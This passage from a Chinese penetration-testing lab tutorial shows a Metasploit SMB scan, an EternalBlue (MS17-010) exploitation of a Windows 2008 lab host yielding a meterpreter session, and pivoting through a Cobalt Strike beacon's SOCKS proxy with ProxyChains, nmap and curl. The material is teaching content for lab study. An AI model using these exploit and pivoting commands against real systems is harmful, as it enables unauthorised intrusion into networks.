<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 128 of 256 hosts <span class="token punctuation">(</span>50<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>133:445   <span class="token operator">-</span> Host is running Windows 7 Ultimate SP1 <span class="token punctuation">(</span>build:7601<span class="token punctuation">)</span> <span class="token punctuation">(</span>name:WINTEST<span class="token punctuation">)</span> <span class="token punctuation">(</span>domain:TEAMSSIX<span class="token punctuation">)</span> <span class="token punctuation">(</span>signatures:optional<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445   <span class="token operator">-</span> Host is running Windows 2008 HPC SP1 <span class="token punctuation">(</span>build:7601<span class="token punctuation">)</span> <span class="token punctuation">(</span>name:WINDC<span class="token punctuation">)</span> <span class="token punctuation">(</span>domain:TEAMSSIX<span class="token punctuation">)</span> <span class="token punctuation">(</span>signatures:required<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 165 of 256 hosts <span class="token punctuation">(</span>64<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 184 of 256 hosts <span class="token punctuation">(</span>71<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 220 of 256 hosts <span class="token punctuation">(</span>85<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 249 of 256 hosts <span class="token punctuation">(</span>97<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>0<span class="token operator">/</span>24:445  <span class="token operator">-</span> Scanned 256 of 256 hosts <span class="token punctuation">(</span>100<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Auxiliary module execution completed
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br></div></div><p>5、发现利用</p> <p>通过扫描发现在 192.168.232.0/24 地址段内，除了已经上线的 <code>133</code> 主机外，还有 <code>132</code> 主机也开放了 445 端口，且该主机为 Windows 2008 的操作系统，这里使用永恒之蓝作为演示。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.232.132
set payload windows/x64/meterpreter/bind_tcp
exploit
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>msf5 &gt; use exploit<span class="token operator">/</span>windows<span class="token operator">/</span>smb<span class="token operator">/</span>ms17_010_eternalblue

msf5 exploit<span class="token punctuation">(</span>windows<span class="token operator">/</span>smb<span class="token operator">/</span>ms17_010_eternalblue<span class="token punctuation">)</span> &gt; <span class="token function">set</span> rhosts 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
rhosts =&gt; 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132

msf5 exploit<span class="token punctuation">(</span>windows<span class="token operator">/</span>smb<span class="token operator">/</span>ms17_010_eternalblue<span class="token punctuation">)</span> &gt; <span class="token function">set</span> payload windows<span class="token operator">/</span>x64<span class="token operator">/</span>meterpreter<span class="token operator">/</span>bind_tcp
payload =&gt; windows<span class="token operator">/</span>x64<span class="token operator">/</span>meterpreter<span class="token operator">/</span>bind_tcp

msf5 exploit<span class="token punctuation">(</span>windows<span class="token operator">/</span>smb<span class="token operator">/</span>ms17_010_eternalblue<span class="token punctuation">)</span> &gt; exploit 
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> <span class="token keyword">Using</span> auxiliary<span class="token operator">/</span>scanner<span class="token operator">/</span>smb<span class="token operator">/</span>smb_ms17_010 as check
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445   <span class="token operator">-</span> Host is likely VULNERABLE to MS17<span class="token operator">-</span>010<span class="token operator">!</span> <span class="token operator">-</span> Windows Server 2008 HPC Edition 7601 Service Pack 1 x64 <span class="token punctuation">(</span>64<span class="token operator">-</span>bit<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445   <span class="token operator">-</span> Scanned 1 of 1 hosts <span class="token punctuation">(</span>100<span class="token operator">%</span> complete<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Connecting to target <span class="token keyword">for</span> exploitation<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Connection established <span class="token keyword">for</span> exploitation<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Target OS selected valid <span class="token keyword">for</span> OS indicated by SMB reply
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> CORE raw buffer dump <span class="token punctuation">(</span>51 bytes<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> 0x00000010  30 30 38 20 48 50 43 20 45 64 69 74 69 6f 6e 20  008 HPC Edition 
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> 0x00000030  6b 20 31                                         k 1             
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Target arch selected valid <span class="token keyword">for</span> arch indicated by DCE<span class="token operator">/</span>RPC reply
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Trying exploit with 12 Groom Allocations<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending all but last fragment of exploit packet
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Starting non<span class="token operator">-</span>paged pool grooming
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending SMBv2 buffers
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending final SMBv2 buffers<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending last fragment of exploit packet<span class="token operator">!</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Receiving response <span class="token keyword">from</span> exploit packet
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> ETERNALBLUE overwrite completed successfully <span class="token punctuation">(</span>0xC000000D<span class="token punctuation">)</span><span class="token operator">!</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Sending egg to corrupted connection<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> Triggering free of corrupted buffer<span class="token punctuation">.</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Started bind TCP handler against 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:4444
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Sending stage <span class="token punctuation">(</span>201283 bytes<span class="token punctuation">)</span> to 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Meterpreter session 1 opened <span class="token punctuation">(</span>0<span class="token punctuation">.</span>0<span class="token punctuation">.</span>0<span class="token punctuation">.</span>0:0 <span class="token operator">-</span>&gt; 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527<span class="token punctuation">)</span> at 2020<span class="token operator">-</span>09<span class="token operator">-</span>01 22:13:57 <span class="token operator">-</span>0400
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> =<span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> =<span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-</span>WIN<span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445 <span class="token operator">-</span> =<span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span><span class="token operator">-=</span>

meterpreter &gt; ipconfig
Interface 11
============
Name         : Intel<span class="token punctuation">(</span>R<span class="token punctuation">)</span> PRO<span class="token operator">/</span>1000 MT Network Connection
Hardware MAC : 00:0c:29:d3:6c:3d
MTU          : 1500
IPv4 Address : 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
IPv4 Netmask : 255<span class="token punctuation">.</span>255<span class="token punctuation">.</span>255<span class="token punctuation">.</span>0
IPv6 Address : fe80::a1ac:3035:cbdf:4872
IPv6 Netmask : ffff:ffff:ffff:ffff::
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br></div></div><h3 id="使用-proxychains-进行代理转发">使用 
ProxyChains 进行代理转发 <a href="#使用-proxychains-进行代理转发" class="header-anchor">#</a></h3> <p>使用 ProxyChains 可以使我们为没有代理配置功能的软件强制使用代理</p> <ol><li>和<a href="https://teamssix.com/year/200419-150644.html" target="_blank" rel="noopener noreferrer">上一节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>中介绍的一致，开启一个 socks 代理服务</li> <li>配置 <code>/etc/proxychains.conf</code> 文件</li> <li>运行 <code>proxychains + 待执行命令</code></li></ol> <p>接下来继续<a href="https://teamssix.com/year/200419-150644.html" target="_blank" rel="noopener noreferrer">上一节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>中的演示环境：</p> <blockquote><p>攻击机 IP：192.168.175.200</p> <p>上线主机：外部IP 192.168.175.130、内部IP 192.168.232.133</p> <p>攻击目标：192.168.232.0/24 地址段</p></blockquote> <p>1、设置 socks 代理</p> <p>首先开启交互模式，之后开启 socks 代理</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>sleep 0
socks 9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; <span class="token function">sleep</span> 0
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to become interactive
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 16 bytes
beacon&gt; socks 9527
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 16 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> started SOCKS4a server on: 9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>2、配置 ProxyChains</p> <p>在攻击机上，将 <code>/etc/proxychains.conf</code> 文件的最后一行按当前攻击主机 IP 与所设置的 Socks 端口修改如下：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socks4 192.168.175.200 9527
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、开始使用 ProxyChains</p> <p>根据<a href="https://teamssix.com/year/200419-150644.html" target="_blank" rel="noopener noreferrer">上一节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>中使用 Metasploit 的扫描结果可以知道，192.168.232.0/24 地址段中存在主机 192.168.232.132，接下来使用 nmap 扫描一下常见的端口，这里以 80,443,445,3389 作为演示。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>proxychains nmap -sT -Pn 192.168.232.132 -p 80,443,445,3389
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><blockquote><p>-sT：使用 TCP 全连接（connect）扫描</p> <p>-Pn：跳过主机发现，不发送 Ping</p> <p>-p：指定扫描端口</p> <p>注：proxychains 通过预加载库劫持程序的套接字连接函数，只有基于 connect() 建立的 TCP 连接才会经过代理；SYN 扫描和 ICMP Ping 使用原始套接字，不会走代理。因此不加上 -sT -Pn 参数，将无法使用 proxychains 进行代理扫描</p></blockquote> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>&gt; proxychains nmap <span class="token operator">-</span>sT <span class="token operator">-</span>Pn 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132 <span class="token operator">-</span>p 80<span class="token punctuation">,</span>443<span class="token punctuation">,</span>445<span class="token punctuation">,</span>3389                       
<span class="token namespace">[proxychains]</span> config file found: <span class="token operator">/</span>etc<span class="token operator">/</span>proxychains<span class="token punctuation">.</span>conf
<span class="token namespace">[proxychains]</span> preloading <span class="token operator">/</span>usr<span class="token operator">/</span>lib<span class="token operator">/</span>x86_64<span class="token operator">-</span>linux<span class="token operator">-</span>gnu<span class="token operator">/</span>libproxychains<span class="token punctuation">.</span>so<span class="token punctuation">.</span>4
<span class="token namespace">[proxychains]</span> DLL init: proxychains<span class="token operator">-</span>ng 4<span class="token punctuation">.</span>14
Starting Nmap 7<span class="token punctuation">.</span>80 <span class="token punctuation">(</span> https:<span class="token operator">/</span><span class="token operator">/</span>nmap<span class="token punctuation">.</span>org <span class="token punctuation">)</span> at 2020<span class="token operator">-</span>09<span class="token operator">-</span>07 23:05 EDT
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:80  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  OK
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:445  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  OK
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:3389  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  OK
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:443 &lt;<span class="token operator">--</span>denied
Nmap scan report <span class="token keyword">for</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
Host is up <span class="token punctuation">(</span>0<span class="token punctuation">.</span>19s latency<span class="token punctuation">)</span><span class="token punctuation">.</span>

PORT     STATE  SERVICE
80<span class="token operator">/</span>tcp   open   http
443<span class="token operator">/</span>tcp  closed https
445<span class="token operator">/</span>tcp  open   microsoft<span class="token operator">-</span>ds
3389<span class="token operator">/</span>tcp open   ms<span class="token operator">-</span>wbt<span class="token operator">-</span>server

Nmap done: 1 IP address <span class="token punctuation">(</span>1 host up<span class="token punctuation">)</span> scanned in 14<span class="token punctuation">.</span>35 seconds
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><p>通过扫描可以看到目标 80 端口是开放的，接下来使用 curl 作为对比示例。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>curl 192.168.232.132
proxychains curl 192.168.232.132
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>&gt; curl 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
curl: <span class="token punctuation">(</span>7<span class="token punctuation">)</span> Failed to connect to 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132 port 80: No route to host

&gt; proxychains curl 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
<span class="token namespace">[proxychains]</span> config file found: <span class="token operator">/</span>etc<span class="token operator">/</span>proxychains<span class="token punctuation">.</span>conf
<span class="token namespace">[proxychains]</span> preloading <span class="token operator">/</span>usr<span class="token operator">/</span>lib<span class="token operator">/</span>x86_64<span class="token operator">-</span>linux<span class="token operator">-</span>gnu<span class="token operator">/</span>libproxychains<span class="token punctuation">.</span>so<span class="token punctuation">.</span>4
<span class="token namespace">[proxychains]</span> DLL init: proxychains<span class="token operator">-</span>ng 4<span class="token punctuation">.</span>14
<span class="token namespace">[proxychains]</span> Strict chain  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200:9527  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132:80  <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>  OK
&lt;<span class="token operator">!</span>DOCTYPE html PUBLIC <span class="token string">&quot;-//W3C//DTD XHTML 1.0 Strict//EN&quot;</span> <span class="token string">&quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd&quot;</span>&gt;
&lt;html xmlns=<span class="token string">&quot;http://www.w3.org/1999/xhtml&quot;</span>&gt;
&lt;head&gt;
&lt;meta http<span class="token operator">-</span>equiv=<span class="token string">&quot;Content-Type&quot;</span> content=<span class="token string">&quot;text/html; charset=iso-8859-1&quot;</span> <span class="token operator">/</span>&gt;
……内容太多，此处省略……                 
